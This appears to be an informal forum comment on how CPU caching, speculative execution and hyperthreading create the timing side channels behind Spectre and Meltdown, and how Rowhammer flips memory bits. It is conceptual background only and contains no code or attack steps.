Basically this was known about years ago, as an erratum in a datasheet about the superscalar architecture, having variable latency in branching, due to the speculative code execution, branch prediction and other fun things to do with caching. Due to the CPU being so fast that waiting for the slow ( to the CPU) L2 cache to respond to a memory access request would involve 100 or more clock cycles that could otherwise be used, and the L2 cache similarly would have a 1000 or more cycle ( to the processor all of eternity plus some more in waiting time for the first byte to come through, then again an eternity for the rest of the byte) to main memory for data. Thus the need to use that otherwise unused cycle time, first by having a prediction algorithm to do the OOO execution, the predictive branching and the speculative execution in the waiting time, and then having extra cache space and controllers to handle all the data that came with it before it was discarded, and then seeing that a separate set of those cache blocks and some logic meant you could have a virtual processor to use the time that L1 was stalled waiting for L2 or main to respond, thus you could create hyperthreads in the same silicon with minimal overhead in most cases.
All this means that execution times per instruction depend on the other things around, and this was considered an annoyance as it prevented simple loops from being a good time ( as before on older X86 code with predictable number of cycle execution times and thus a known time to do a loop) standard. then just recently somebody took a look at that and thought that if the timing depends on what happens around the thread then there could be information leaking out of there. Thus Spectre and Meltdown, and previously Rowhammer where they thought about that old bug in memory, of bounce being an issue with memory cells if there was enough noise induced into a cell, to cause local reference rails to rise enough to cause a flipped bit in adjacent cells of memory.